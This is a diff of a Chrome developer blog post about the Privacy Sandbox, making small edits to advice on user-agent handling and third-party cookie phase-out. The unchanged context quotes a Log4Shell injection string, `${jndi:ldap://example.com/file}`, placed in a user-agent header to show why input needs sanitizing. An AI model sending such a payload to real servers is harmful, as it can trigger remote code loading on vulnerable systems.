GoogleChrome/developer.chrome.com/site/en/blog/progress-in-the-privacy-sandbox-2021-12/index.md

 vulnerability, "Log4shell"](https://logging.apache.org/log4j/2.x/security.html)
 provides an example of this risk.
 A client that sets its user-agent string to include a value like `${jndi:ldap://example.com/file}` may be able to get a site to actively parse that on the server.

+{% Aside 'caution' %}

 It's critical that you treat user-agent in the same way as any other form of user input: sanitize and validate it before acting on the value.

+{% endAside %}

 ### Cookie cataloguing

-Another traditional new year activity is to make sure you're happy you have a healthy number of cookies with quality ingredients.
+Another traditional new year activity is to make sure you're happy that you have a healthy number of cookies with quality ingredients.
 As we continue moving towards the phase out of third-party cookies, you should make sure you know which of your site's cookies will be affected.
 2020 provided a headstart as it became necessary to [mark all cookies for cross-site or third-party